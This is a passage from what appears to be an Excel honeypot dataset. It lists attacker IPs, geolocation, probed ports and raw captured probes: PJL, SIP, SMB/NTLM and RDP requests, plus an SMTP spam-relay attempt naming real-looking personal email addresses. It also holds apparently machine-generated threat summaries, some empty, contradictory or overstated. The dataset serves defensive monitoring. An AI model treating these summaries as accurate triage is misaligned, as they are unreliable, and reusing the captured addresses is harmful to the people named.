    <t>SMA-LAB_ORACLE_H2&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_ORACLE_H41&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_SIP_H35&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_MYSQL_H40&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_REDIS_H10</t>
  </si>
  <si>
    <t>1521&amp;&amp;6379&amp;&amp;5432&amp;&amp;1080&amp;&amp;445&amp;&amp;9100&amp;&amp;443&amp;&amp;NA&amp;&amp;3306&amp;&amp;143&amp;&amp;6667&amp;&amp;110&amp;&amp;21&amp;&amp;25&amp;&amp;80&amp;&amp;45897&amp;&amp;1433&amp;&amp;23&amp;&amp;5900&amp;&amp;42139&amp;&amp;49321&amp;&amp;43963&amp;&amp;36325&amp;&amp;389</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;GET&amp;&amp;NA&amp;&amp;login&amp;&amp;query&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.227,36253)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.227,45945)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'rblofivn', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.227;tag=rblofivn', 'max-forwards': '0', 'to': 'sip:38.54.117.64', 'via': 'SIP/2.0/UDP 185.247.137.227:5060;branch=z9hG4bKrblofivn;received=185.247.137.227;rport=56257'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 95.164.21.98:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.146.12.172:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'vmifplis', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.227;tag=vmifplis', 'max-forwards': '0', 'to': 'sip:38.60.224.106', 'via': 'SIP/2.0/UDP 185.247.137.227:5060;branch=z9hG4bKvmifplis;received=185.247.137.227;rport=35800'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}</t>
  </si>
  <si>
    <t>::ffff:b9f7:89e3</t>
  </si>
  <si>
    <t>No log data available for analysis. &amp;&amp; No available log data provided for analysis. &amp;&amp; The user is querying for FTP server help, which could be a reconnaissance attempt to gather information about the system's configuration and potential vulnerabilities. This action alone does not indicate malicious intent but may be part of a larger probing activity. Further analysis of subsequent actions would be necessary to assess actual threat level.</t>
  </si>
  <si>
    <t>File Scan</t>
  </si>
  <si>
    <t>6dbe3dff611df76d561b79282a68e35f</t>
  </si>
  <si>
    <t>92.17.191.106</t>
  </si>
  <si>
    <t>NA&amp;&amp;host-92-17-191-106.as13285.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>SCT</t>
  </si>
  <si>
    <t>Scotland</t>
  </si>
  <si>
    <t>Fife</t>
  </si>
  <si>
    <t>Springfield</t>
  </si>
  <si>
    <t>2637194</t>
  </si>
  <si>
    <t>56.2951</t>
  </si>
  <si>
    <t>-3.0612</t>
  </si>
  <si>
    <t>13285</t>
  </si>
  <si>
    <t>TalkTalk Communications Limited</t>
  </si>
  <si>
    <t>TalkTalk</t>
  </si>
  <si>
    <t>Carphone Warehouse Broadband Services</t>
  </si>
  <si>
    <t>::ffff:5c11:bf6a</t>
  </si>
  <si>
    <t>9c8153a5a52691f9aef0bfa90f3a2c2a</t>
  </si>
  <si>
    <t>189.254.197.174</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;25571&amp;&amp;NA&amp;&amp;54552</t>
  </si>
  <si>
    <t>MX</t>
  </si>
  <si>
    <t>Mexico</t>
  </si>
  <si>
    <t>CMX</t>
  </si>
  <si>
    <t>Mexico City</t>
  </si>
  <si>
    <t>Mexico City (Manantial Peña Pobre)</t>
  </si>
  <si>
    <t>3530597</t>
  </si>
  <si>
    <t>19.2974</t>
  </si>
  <si>
    <t>-99.1842</t>
  </si>
  <si>
    <t>8151</t>
  </si>
  <si>
    <t>Uninet S.A. de C.V.</t>
  </si>
  <si>
    <t>UNINET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,64526)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,64619)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,18010)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,18081)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,11245)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,11310)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,25809)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,25847)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,64047)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,23763)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,53840)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,53928)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,20257)}&amp;&amp;{Data_SMB:Incoming connection (189.254.197.174,20340)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:bdfe:c5ae</t>
  </si>
  <si>
    <t>This log indicates that there are no records of malicious activity yet, indicating that the system is idle or inactive. The absence of logs does not necessarily mean there's no threat; it could be due to lack of traffic or successful evasion by attackers. Further monitoring is required for accurate assessment.</t>
  </si>
  <si>
    <t>c7b5fe920d215aeff375f8085ee1db94</t>
  </si>
  <si>
    <t>115.244.183.166</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_LDAP_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;60022&amp;&amp;3306&amp;&amp;445&amp;&amp;389&amp;&amp;1433&amp;&amp;53620</t>
  </si>
  <si>
    <t>28.6139</t>
  </si>
  <si>
    <t>77.2088</t>
  </si>
  <si>
    <t>Reliance Communication Ltd</t>
  </si>
  <si>
    <t>2008-09-08</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:73f4:b7a6</t>
  </si>
  <si>
    <t>540f0a6fdc43d38788ff864df67a9f96</t>
  </si>
  <si>
    <t>182.57.202.171</t>
  </si>
  <si>
    <t>17813</t>
  </si>
  <si>
    <t>MTNL-AP</t>
  </si>
  <si>
    <t>::ffff:b639:caab</t>
  </si>
  <si>
    <t>7f19f55f9783e049f66634b8a7dfe8bc</t>
  </si>
  <si>
    <t>117.209.12.245</t>
  </si>
  <si>
    <t>::ffff:75d1:cf5</t>
  </si>
  <si>
    <t>ea030cf8f0c499cac9f042cb56fea18f</t>
  </si>
  <si>
    <t>141.98.10.130</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H27</t>
  </si>
  <si>
    <t>25</t>
  </si>
  <si>
    <t>KU</t>
  </si>
  <si>
    <t>Kaunas</t>
  </si>
  <si>
    <t>598316</t>
  </si>
  <si>
    <t>44001</t>
  </si>
  <si>
    <t>54.9072</t>
  </si>
  <si>
    <t>24.0019</t>
  </si>
  <si>
    <t>209605</t>
  </si>
  <si>
    <t>UAB Host Baltic</t>
  </si>
  <si>
    <t>2019-01-10</t>
  </si>
  <si>
    <t>{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;pw8h-ngn@asahi-net.or.jp&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;bankofamericaonline@meta.ua&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;chiyere.ugo@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;drudorji_ojide@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;officefle20012001@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;uba.ubainfo@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;unitednation.agency@safe-mail.net&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 22 Mar 2025 19:34:55 +0100_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:8d62:a82</t>
  </si>
  <si>
    <t>Someone is sending unsolicited email from the address spameri@tiscali.it and attempting to send mail via SMTP. This could be a spammer or phisher trying to use this service for malicious purposes. The email content itself is unknown but likely to contain malware or phishing links. &amp;&amp; Malicious user attempting to send spam email by trying to verify recipient's email address using SMTP. This is a reconnaissance step before sending actual malicious emails. User is testing if the recipient exists and their account can receive emails. &amp;&amp; The data suggests a potential malicious SMTP connection attempt where an attacker is attempting to send data as part of an email, which could be used for phishing or spamming purposes. The lack of specified argument and command indicates an unusual or unauthorized activity. This may indicate an exploit of the SMTP service by an attacker trying to send malicious emails. &amp;&amp; No malicious activity detected for SMTP service, indicating potential lack of interaction or probing attempts. No suspicious connections were made to this service. Data is incomplete or unavailable for SMTP logs. &amp;&amp; Malicious user attempting to reset SMTP session, possibly trying to spoof or evade detection. This could be an initial step before sending spam or phishing emails. Further analysis is needed to determine full intent and scope of the activity. &amp;&amp; This indicates a potential brute-force attack on an email account, with multiple RSET commands being sent to reset the SMTP connection and attempt further login attempts. This is often used by attackers to bypass authentication mechanisms. The sender is attempting to evade detection by not sending actual data. &amp;&amp; An unknown sender is attempting to send an email from a potentially compromised account, which may be part of a spam campaign. The sender's IP address is not provided in the log data but the email sender appears to be spoofed. This could indicate a malicious attempt to spread unsolicited emails. &amp;&amp; This log indicates a possible attempt to send spam email as an attacker is trying to verify a recipient's address for malicious purposes. The command 'RCPT' is used to specify the recipient in an SMTP communication. This could be part of a larger attack to spread malware or phishing campaigns.</t>
  </si>
  <si>
    <t>Spam Mail &amp;&amp; Spam Attack &amp;&amp; Spam Data &amp;&amp; Spamming Attack &amp;&amp; Portscan &amp;&amp; Brute Force &amp;&amp; SMTP Spam &amp;&amp; Spam Email</t>
  </si>
  <si>
    <t>45a46f798d079d478efe59d838f15551</t>
  </si>
  <si>
    <t>185.180.141.57</t>
  </si>
  <si>
    <t>zl-dala-us-gp1-wk144a.internet-census.org&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SIP_H24&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_NTP_H24&amp;&amp;SMA-LAB_DNS_H2&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTPS_H6&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_IRC_H17&amp;&amp;SMA-LAB_LDAP_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;161&amp;&amp;53&amp;&amp;10010&amp;&amp;23&amp;&amp;443&amp;&amp;1521&amp;&amp;5432&amp;&amp;143&amp;&amp;445&amp;&amp;389&amp;&amp;6667&amp;&amp;80&amp;&amp;6379&amp;&amp;9100&amp;&amp;3389&amp;&amp;110</t>
  </si>
  <si>
    <t>TX</t>
  </si>
  <si>
    <t>Texas</t>
  </si>
  <si>
    <t>Dallas</t>
  </si>
  <si>
    <t>4684888</t>
  </si>
  <si>
    <t>75270</t>
  </si>
  <si>
    <t>32.7767</t>
  </si>
  <si>
    <t>-96.797</t>
  </si>
  <si>
    <t>ICG 1 ZEN DFW</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;command&amp;&amp;stshash&amp;&amp;NA&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': 'vmi1261124.contaboserver.net', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'DCAK0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 209.145.61.177:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_IRC:{'command': 'SSH-2.0-GO', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}</t>
  </si>
  <si>
    <t>::ffff:b9b4:8d39</t>
  </si>
  <si>
    <t>It appears that the attacker is scanning and probing various services on a network, attempting to identify vulnerabilities and potential entry points. The activities suggest reconnaissance, mapping of network infrastructure, and testing of login credentials. &amp;&amp; The attacker is scanning and probing various services on the network, attempting to identify vulnerabilities and potential entry points. They are also trying to authenticate with different credentials and test the security of systems. The attacker appears to be using a variety of techniques to gather information and potentially exploit weaknesses in the network. &amp;&amp; The system detected an attempt to access PostgreSQL database services, possibly indicating a malicious login or brute force attack effort to gain unauthorized access. This could be a sign of a larger security issue or a targeted attack on the database infrastructure. The absence of any specific action taken suggests this may have been a reconnaissance or probing activity. &amp;&amp; No log data provided, unable to analyze. 
No indication of malicious activity found. 
Normal system operation expected.</t>
  </si>
  <si>
    <t xml:space="preserve"> Credential stuffing/Brute Force attack &amp;&amp; PortScan</t>
  </si>
  <si>
    <t>1722efca4db9010f8065da1dd8fd485b</t>
  </si>
  <si>
    <t>220.132.134.233</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-132-134-233.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;45784</t>
  </si>
  <si>
    <t>::ffff:dc84:86e9</t>
  </si>
  <si>
    <t>No available log data provided, cannot analyze malicious activity. 
Malicious scripts attempting to exploit known vulnerabilities may be occurring but cannot confirm without actual logs. 
(If you provide the actual log data, I'd be happy to help with a more detailed analysis.)</t>
  </si>
  <si>
    <t>I need some log data to analyze. Please provide it, and I'll be happy to identify the types of attacks based on the information.</t>
  </si>
  <si>
    <t>81b3747aebf7008210028a8b35d145b6</t>
  </si>
  <si>
    <t>121.142.244.108</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H4</t>
  </si>
  <si>
    <t>23&amp;&amp;46485&amp;&amp;NA</t>
  </si>
  <si>
    <t>28</t>
  </si>
  <si>
    <t>Incheon</t>
  </si>
  <si>
    <t>Namdong-gu</t>
  </si>
  <si>
    <t>8417651</t>
  </si>
  <si>
    <t>405-231</t>
  </si>
  <si>
    <t>37.3989</t>
  </si>
  <si>
    <t>126.707</t>
  </si>
  <si>
    <t>NA&amp;&amp;connection</t>
  </si>
  <si>
    <t>::ffff:798e:f46c</t>
  </si>
  <si>
    <t>8dddc2ef7b50adee5f7ad1dd050a7820</t>
  </si>
  <si>
    <t>154.212.141.202</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;SIP Email Impersonation</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_POSTGRES_H25&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_SIP_H32&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_RDP_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;22&amp;&amp;443&amp;&amp;3389&amp;&amp;143&amp;&amp;9100&amp;&amp;1433&amp;&amp;NA&amp;&amp;25&amp;&amp;23&amp;&amp;5432&amp;&amp;80&amp;&amp;21&amp;&amp;110&amp;&amp;50208&amp;&amp;50296&amp;&amp;3306</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;query&amp;&amp;command&amp;&amp;GET&amp;&amp;request&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 91.194.11.82:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.202,37864)}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '94.131.8.76:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '94.131.8.76:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 95.164.21.98:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.202;rport=44490'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '185.74.222.213:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
